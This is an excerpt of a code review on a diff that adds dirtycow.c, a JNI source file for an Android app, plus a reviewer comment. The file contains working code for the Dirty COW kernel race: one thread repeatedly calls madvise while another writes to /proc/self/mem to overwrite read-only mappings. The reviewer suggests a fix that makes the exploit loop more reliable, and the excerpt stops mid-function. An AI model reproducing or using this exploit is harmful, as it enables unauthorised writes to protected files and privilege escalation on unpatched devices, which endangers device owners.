app/src/main/jni/dirtycow.c

```diff
@@ -0,0 +1,192 @@
+#include <err.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <jni.h>
+
+#ifdef DEBUG
+#include <android/log.h>
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#else
+#define LOGV(...)
+#endif
+
+#define LOOP   0x75000
+#define STRINGSIZE 200
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+struct mem_arg  {
+	unsigned char *offset;
+	unsigned char *patch;
+	unsigned char *unpatch;
+	size_t patch_size;
+	int do_patch;
+};
+
+// enum defining the Error codes for JNI
+typedef enum EerrorCode{
+    success = 0,
+    cantOpenFile,
+    cantMap,
+    wrongParamater
+} errorCode;
+
+
+static void *madviseThread(void *arg)
+{
+	struct mem_arg *mem_arg;
+	size_t size;
+	void *addr;
+	int i, c = 0;
+
+	mem_arg = (struct mem_arg *)arg;
+	size = mem_arg->patch_size;
+	addr = (void *)(mem_arg->offset);
+
+	LOGV("[*] madvise = %p %d", addr, size);
+
+	for(i = 0; i < LOOP; i++) {
+		c += madvise(addr, size, MADV_DONTNEED);
+	}
+	LOGV("[*] madvise = %d %d", c, i);
+	return 0;
+}
+
+static void *procselfmemThread(void *arg)
+{
+	struct mem_arg *mem_arg;
+	int fd, i, c = 0;
+	unsigned char *p;
+
+	mem_arg = (struct mem_arg *)arg;
+	p = mem_arg->do_patch ? mem_arg->patch : mem_arg->unpatch;
+
+	fd = open("/proc/self/mem", O_RDWR);
+	if (fd == -1)
+		LOGV("open(\"/proc/self/mem\"");
+	for (i = 0; i < LOOP; i++) {
+        lseek(fd, (off_t) mem_arg->offset, SEEK_SET);
+        c += write(fd, p, mem_arg->patch_size);
```

Comment:
This thread loops and writes no matter whether the private mapping was written to or not. You should check after each write if the r/o mapping was written to and bail on this loop if that is the case.